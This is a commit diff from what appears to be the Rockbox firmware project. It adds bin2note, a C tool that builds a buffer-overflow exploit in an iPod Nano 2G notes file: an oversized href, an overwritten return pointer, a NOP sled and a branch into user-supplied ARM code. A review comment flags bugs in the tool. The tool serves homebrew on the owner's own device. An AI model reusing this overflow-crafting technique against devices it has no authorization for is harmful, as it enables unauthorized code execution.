Diffstat (limited to 'utils/ipod/bin2note')
-rw-r--r-- | utils/ipod/bin2note/Makefile | 16 | ||||
-rw-r--r-- | utils/ipod/bin2note/README | 12 | ||||
-rw-r--r-- | utils/ipod/bin2note/bin2note.c | 180 |
3 files changed, 208 insertions, 0 deletions
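--- /dev/null
+++ b/utils/ipod/bin2note/Makefile
@@ -0,0 +1,16 @@
+# __________ __ ___.
+# Open \______ \ ____ ____ | | _\_ |__ _______ ___
+# Source | _// _ \_/ ___\| |/ /| __ \ / _ \ \/ /
+# Jukebox | | ( <_> ) \___| < | \_\ ( <_> > < <
+# Firmware |____|_ /\____/ \___ >__|_ \|___ /\____/__/\_ \
+# \/ \/ \/ \/ \/
+# $Id$
+#
+
+all: bin2note
+
+bin2note: bin2note.c
+gcc -W -Wall -o bin2note bin2note.c
+
+clean:
+rm -f bin2note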
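--- /dev/null
+++ b/utils/ipod/bin2note/README
@@ -0,0 +1,12 @@
+bin2note
+--------
+
+bin2note implements the buffer overflow exploit documented here:
+
+http://l4n.clustur.com/index.php/Nano2G_getting_exec
+
+
+It is used to turn a blob of ARM code into an iPod notes file. This
+ARM code will then be executed on the iPod.
+
+It is known to work on the 2nd generation Nano.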
diff --git a/utils/ipod/bin2note/bin2note.c b/utils/ipod/bin2note/bin2note.c new file mode 100644 index 0000000000..5100039962 --- /dev/null +++ b/utils/ipod/bin2note/bin2note.c | |||
@@ -0,0 +1,180 @@ | |||
1 | /*************************************************************************** | ||
2 | * __________ __ ___. | ||
3 | * Open \______ \ ____ ____ | | _\_ |__ _______ ___ | ||
4 | * Source | _// _ \_/ ___\| |/ /| __ \ / _ \ \/ / | ||
5 | * Jukebox | | ( <_> ) \___| < | \_\ ( <_> > < < | ||
6 | * Firmware |____|_ /\____/ \___ >__|_ \|___ /\____/__/\_ \ | ||
7 | * \/ \/ \/ \/ \/ | ||
8 | * $Id$ | ||
9 | * | ||
10 | * bin2note - a program to insert binary code in an iPod Nano 2nd | ||
11 | * Generation notes file | ||
12 | * | ||
13 | * Based on research by stooo, TheSeven and others. | ||
14 | * | ||
15 | * Copyright (C) 2009 Dave Chapman | ||
16 | * | ||
17 | * This program is free software; you can redistribute it and/or | ||
18 | * modify it under the terms of the GNU General Public License | ||
19 | * as published by the Free Software Foundation; either version 2 | ||
20 | * of the License, or (at your option) any later version. | ||
21 | * | ||
22 | * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY | ||
23 | * KIND, either express or implied. | ||
24 | * | ||
25 | ****************************************************************************/ | ||
26 | |||
27 | #include <stdio.h> | ||
28 | #include <string.h> | ||
29 | #include <sys/types.h> | ||
30 | #include <sys/stat.h> | ||
31 | #include <fcntl.h> | ||
32 | #include <stdlib.h> | ||
33 | #include <unistd.h> | ||
34 | #include <stdint.h> | ||
35 | |||
36 | #ifndef O_BINARY | ||
37 | #define O_BINARY 0 | ||
38 | #endif | ||
39 | |||
40 | static off_t filesize(int fd) | ||
41 | { | ||
42 | struct stat buf; | ||
43 | |||
44 | fstat(fd,&buf); | ||
45 | return buf.st_size; | ||
46 | } | ||
47 | |||
48 | void write_utf16le(unsigned char* buf, int len, FILE* fp) | ||
49 | { | ||
50 | int i; | ||
51 | char tmp[2]; | ||
52 | |||
53 | tmp[1] = 0; | ||
54 | |||
55 | for (i=0;i<len;i++) { | ||
56 | tmp[0] = buf[i]; | ||
57 | fwrite(tmp, 1, sizeof(tmp), fp); | ||
58 | } | ||
59 | } | ||
60 | |||
61 | void insert_link(unsigned char* buf, uint32_t pointer) | ||
62 | { | ||
63 | char link[] = "<a href=\"AAAAAAA" | ||
64 | "AAAAAAAAAAAAAAAA" | ||
65 | "AAAAAAAAAAAAAAAA" | ||
66 | "AAAAAAAAAAAAAAAA" | ||
67 | "AAAAAAAAAAAAAAAA" | ||
68 | "AAAAAAAAAAAAAAAA" | ||
69 | "AAAAAAAAAAAAAAAA" | ||
70 | "AAAAAAAAAAAAAAAA" | ||
71 | "AAAAAAAAAAAAAAAA" | ||
72 | "AAAAAAAAAAAAAAAA" | ||
73 | "AAAAAAAAAAAAAAAA" | ||
74 | "AAAAAAAAAAAAAAAA" | ||
75 | "AAAAAAAAAAAAAAAA" | ||
76 | "AAAAAAAAAAAAAAAA" | ||
77 | "AAAAAAAAAAAAAAAA" | ||
78 | "AAAAAAAAAAAAAAAA" | ||
79 | "AAAAAAAAAAAAAAAA" | ||
80 | "AAAAAAAAAAAAA%xx" | ||
81 | "%xx%xx%xx\"></a>"; | ||
82 | char tmp[32]; | ||
83 | unsigned int i; | ||
84 | |||
85 | sprintf(tmp, "%%%02x%%%02x%%%02x%%%02x", | ||
86 | pointer & 0xff, | ||
87 | (pointer >> 8) & 0xff, | ||
88 | (pointer >> 16) & 0xff, | ||
89 | (pointer >> 24) & 0xff); | ||
90 | |||
91 | memcpy(link + 0x11d, tmp, 12); | ||
92 | |||
93 | /* UTF-16 little-endian BOM */ | ||
94 | buf[0] = 0xff; | ||
95 | buf[1] = 0xfe; | ||
96 | |||
97 | /* UTF-16 little-endian URL */ | ||
98 | for (i=0;i<strlen(link);i++) { | ||
99 | buf[i*2+2] = link[i]; | ||
100 | buf[i*2+3] = 0; | ||
101 | } | ||
102 | } | ||
103 | |||
104 | #define MAX_NOTES_SIZE 4096 | ||
105 | #define MAX_PAYLOAD_SIZE (MAX_NOTES_SIZE - 0x260 - 4) | ||
106 | |||
107 | int main (int argc, char* argv[]) | ||
108 | { | ||
109 | char* infile; | ||
110 | char* htmname; | ||
111 | int fdin,fdout; | ||
112 | unsigned char buf[MAX_NOTES_SIZE]; | ||
113 | int len; | ||
114 | int n; | ||
115 | int i; | ||
116 | |||
117 | if (argc != 3) { | ||
118 | fprintf(stderr,"Usage: bin2note file.bin file.htm\n"); | ||
119 | return 1; | ||
120 | } | ||
121 | |||
122 | infile=argv[1]; | ||
123 | htmname=argv[2]; | ||
124 | |||
125 | fdin = open(infile,O_RDONLY|O_BINARY); | ||
126 | if (fdin < 0) { | ||
127 | fprintf(stderr,"Can not open %s\n",infile); | ||
128 | return 1; | ||
129 | } | ||
130 | |||
131 | len = filesize(fdin); | ||
132 | |||
133 | if (len > MAX_PAYLOAD_SIZE) { | ||
134 | fprintf(stderr,"Payload too big!\n"); | ||
135 | close(fdin); | ||
136 | return 1; | ||
137 | } | ||
138 | |||
139 | /* **** Input file is OK, now build the note **** */ | ||
140 | |||
141 | /* Insert URL at start of note */ | ||
142 | insert_link(buf, 0x08640568); | ||
143 | |||
144 | /* Load code at offset 0x260 */ | ||
145 | n = read(fdin,buf + 0x260,len); | ||
146 | if (n < len) { | ||
147 | fprintf(stderr,"Short read, aborting\n"); | ||
148 | return 1; | ||
149 | } | ||
150 | close(fdin); | ||
151 | |||
152 | /* Fill the remaining buffer with NOPs (mov r1,r1) - 0xe1a01001 */ | ||
153 | for (i=0x260 + len; i < MAX_NOTES_SIZE-4; i+=4) { | ||
154 | buf[i] = 0x01; | ||
155 | buf[i+1] = 0x10; | ||
156 | buf[i+2] = 0xa0; | ||
157 | buf[i+3] = 0xe1; | ||
158 | } | ||
159 | |||
160 | /* Finally append a branch back to our code - 0x260 in the note */ | ||
161 | buf[MAX_NOTES_SIZE-4] = 0x97; | ||
162 | buf[MAX_NOTES_SIZE-3] = 0xfc; | ||
163 | buf[MAX_NOTES_SIZE-2] = 0xff; | ||
164 | buf[MAX_NOTES_SIZE-1] = 0xea; | ||
165 | |||
166 | fdout = open(htmname, O_CREAT|O_TRUNC|O_BINARY|O_WRONLY, 0666); | ||
167 | if (fdout < 0) { | ||
168 | fprintf(stderr,"Could not open output file\n"); | ||
169 | return 1; | ||
170 | } | ||
171 | |||
172 | if (write(fdout, buf, sizeof(buf)) != sizeof(buf)) { | ||
173 | fprintf(stderr,"Error writing output file\n"); | ||
174 | close(fdout); | ||
175 | return 1; | ||
176 | } | ||
177 | |||
178 | close(fdout); | ||
179 | return 0; | ||
180 | } | ||
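Review bot: In main, `len = filesize(fdin)` narrows an `off_t` to `int`, and filesize() ignores the result of fstat(), so a failed stat or an input of 2 GiB or more can leave `len` negative or wrapped. Such a value passes the `len > MAX_PAYLOAD_SIZE` check and reaches `read(fdin, buf + 0x260, len)` as a very large count against the 4096-byte stack buffer. I would make filesize() do `if (fstat(fd, &buf) != 0) return -1;`, hold the result in an `off_t size`, and reject it with `if (size < 0 || size > MAX_PAYLOAD_SIZE)` before assigning it to `len`. Separately, the padding loop starts at `0x260 + len`, so the fill words are unaligned when `len` is not a multiple of 4, which is presumably unintended and worth rejecting or rounding up. The "Short read" path also returns without `close(fdin)`.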